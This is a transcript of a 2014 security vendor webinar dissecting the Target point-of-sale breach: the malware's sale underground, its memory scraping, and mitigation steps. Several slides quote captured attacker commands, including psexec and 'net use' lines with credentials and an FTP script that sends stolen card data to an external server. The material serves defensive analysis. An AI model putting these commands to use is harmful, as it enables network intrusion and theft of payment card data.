The Target Breach: Anatomy of an Attack
-
Upload
alertlogic -
Category
Technology
-
view
2.019 -
download
7
description
Transcript of The Target Breach: Anatomy of an Attack
> www.alertlogic.com
The Target Data Breach: Anatomy of an Attack
Stephen CotyDirector, Threat Research
Diane GareyProduct Marketing
February 4, 2014
> www.alertlogic.com 2
Today
Agenda• What’s in the News• About POS Malware• How the Malware Works• How to Protect Yourself
Logistics• Ask a question anytime
using the “Question Box” • Look for slides on the
Alert Logic SlideShare account
• You’ll get an email with a link to today’s recording
• Live Tweet today’s event
#AlertLogic_ACID
> www.alertlogic.com 3
30 Days of the Target Breach
Dec 18th Jan 10th Jan 15th Jan 17th
> www.alertlogic.com 4
You Never Want to Send This Communication
> www.alertlogic.com 5
What’s Being Reported
About the Attack• Malicious software infects
POS systems and sends credit card data via FTP
• Possibly home grown POS system running Windows OS
• Malware traced to Russia & sold to 60 European cyber criminals
About the Impact• 110 million customers
affected• Data being sold on the
underground market• Eight other retailers have
been compromised• Arrests being made on
people using the cards
> www.alertlogic.com 6
• Went into testing Feb 12, 2013 under the title:– “Dump CC memory grabber (pos-trojan)”
• Underground community laughed at the outrageous price• Currently not being sold due to Ree[4] selling out buyers
Malware for Sale
• Implemented by sending protakolu FTP
• Log is not encrypted• 1st updated edition
free• Rebuild product 200 $
(max 3)• No support• $1800
Budget Version
• Implemented by sending protakolu FTP
• Log encrypted invented us cipher
• Free updates for 3 months. Rebuild 100 $ (max 5)
• Support• $2000
Economy Version
• Shipping through the gate
• Log encrypted cipher invented by us
• Free updates for life. • Rebuild further by $
100• $2300
FullVersion
> www.alertlogic.com 7
More Malware Sales Details
• License agreement (translated from Russian)– “You use the program on your own risk and creators assume
no responsibility for your further use of this software. When buying, you automatically accept rules. Transfer programs and reselling third parties is prohibited and threatened deprivation of licenses and just what is included in your version.”
• Seller Information– E-mail 1: [email protected]– E-mail 2: [email protected]– ICQ: 565033– Skype: s.r.a.ree4
> www.alertlogic.com 8
Stolen Credit Cards are Selling for $15-60
Recent dumps: ~$15-60 range
Initial dumps: ~$12 average
> www.alertlogic.com
How the Malware (Kaptoxa-Rescator) Works
9
Saves data
• To a default .dll file
Establishes share
• net.exe/net1.exe creates Windows share
Stores and forwards data
• To internal server as a txt file that sends data to an external FTP server controlled by attackers
Disables firewall
• Creates an autorun entry to launch at boot
Infects POS System
• dum.exe exectutes mmom.exe
Scrapes memory
• Scrapes tracks 1 &2 from credit card data
Normal POS Activity: Pre-Infection
Post-Infection Activity: Step 1
New Service
Post-Infection Activity: Step 1.1
Looks like a regular user
Starts POSWDS
Post-Infection Activity: Step 1.2
Filtering for commands: <---- cmd that was issued and captured in malware analysiscmd.exe /c moveC:\WINDOWS\system32\net.EXEnet start POSWDSC:\WINDOWS\system32\cmd.exe /c net use S: \\10.116.240.31\c$\WINDOWS\twain_32a.dll /user:ttcopscli3acs\Best1_user BackupU$
net.exe: establishes
Windows share
Post-Infection Activity: Step 2
BackDoor-FBPL takes the following actions:Step 1C:\WINDOWS\system32\cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\Best1_user -p BackupU$r cmd /c "taskkill /IM bladelogic.exe /F”Step 2c:\windows\system32\cmd.exe /c psexec /accepteula \10.116.240.3 -u ttcopscli3acs\Best1_user -p BackupU$r cmd -d bladelogic
BackDoor-FBPL sleeps until the predetermined time of 10:00am and 5:00pm then runs:Step 1C:\WINDOWS\system32\cmd.exe /c move \\10.116.240.31\NT\twain_32a.dll C:\data_2014_1_20_17_53.txt <-- Name created by date and time from system
> www.alertlogic.com 15
BMC Whitepaper
Post-Infection Activity: Step 2 continued
Step 2: Write data to a text file (cmd.txt)open 199.188.204.182 digitalw Crysis1089 cd etc cd bin send C:\data_2014_1_20_17_53.txt quit
Step 3 Command Linec:\windows\system32\cmd.exe /c ftp -s:c:\program files\xxxxx\xxxxx\temp\cmd.txt> c:\xxxxx\xxxxx\temp\cmd.txt
> www.alertlogic.com 17
Theory: How the Malware was Delivered
Ariba Vendor Portal
> www.alertlogic.com 18
Theory: How the Malware was Delivered
Login to Portal
> www.alertlogic.com 19
Theory: How the Malware was Injected
NCR POS Terminals
> www.alertlogic.com 20
Evolution of Target POS Malware
Memory Dumper
Copy a specific process in memory
DexterPOS
Steals the process list from an
infected machine while parsing
memory dumps
VSkimmer
Detect card readers, grab
information, send data to a control
server
AlinaPOS
v1 Createdv2 Encryption, v2.1 Logging
v3.2 & 5.2 Exfiltration
BlackPOS / Kaptoxa / Rescator
2008 2010 2012 2013
> www.alertlogic.com 21
Kaptoxa & Others Originated from Dexter
• Dexter:– Able to read process memory from infected machines– Parses memory dumps looking for track 1 & 2 of the
credit card data
• Infected POS systems in 40 countries– 42% of the systems
infected were in NA– 19% in the UK
• Targeted Windows OS
> www.alertlogic.com 22
How to Mitigate Risk
• Scan POS systems with your choice of antivirus • Check for the removal of autorun keys
• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the value "svchit”
• Check for removal of three executables• %USERPROFILE%/svchst.exe• Dum.exe• Mmon.exe
• Disable external FTP access outbound from the POS system on the network vs the host itself
• Create a whitelist of acceptable external addresses using IP filtering rules or Access Control Lists (ACL)
Contact us for a copy of our
Malware Analysis Report
> www.alertlogic.com 23
Credits to the Sources of Data
• http://www.alertlogic.com/data-breach-at-target-exposes-40-million-credit-cards/
• http://www.seculert.com/blog/2012/12/dexter-draining-blood-out-of-point-of-sales.html
• http://krebsonsecurity.com/2014/01/a-first-look-at-the-target-intrusion-malware/
• http://www.cyphort.com/blog/cyphort-tracks-down-new-variants-of-target-malware/
• http://www.tripwire.com/state-of-security/vulnerability-management/targets-point-sale-system-compromised/
> www.alertlogic.com 24
Join Tomorrow’s WebinarDelivering Real Protection: Alert Logic Security-as-a-Service
• http://alrt.co/ThreatLogDemo
• Full managedintrusion detectionand log management
• Deploy anywhereyour datacenter islocated
> www.alertlogic.com
Thank you!
To Follow our Research:
#AlertLogic_ACIDhttp://www.alertlogic.com/resources/blog/
[email protected] -> “Malware Analysis Report”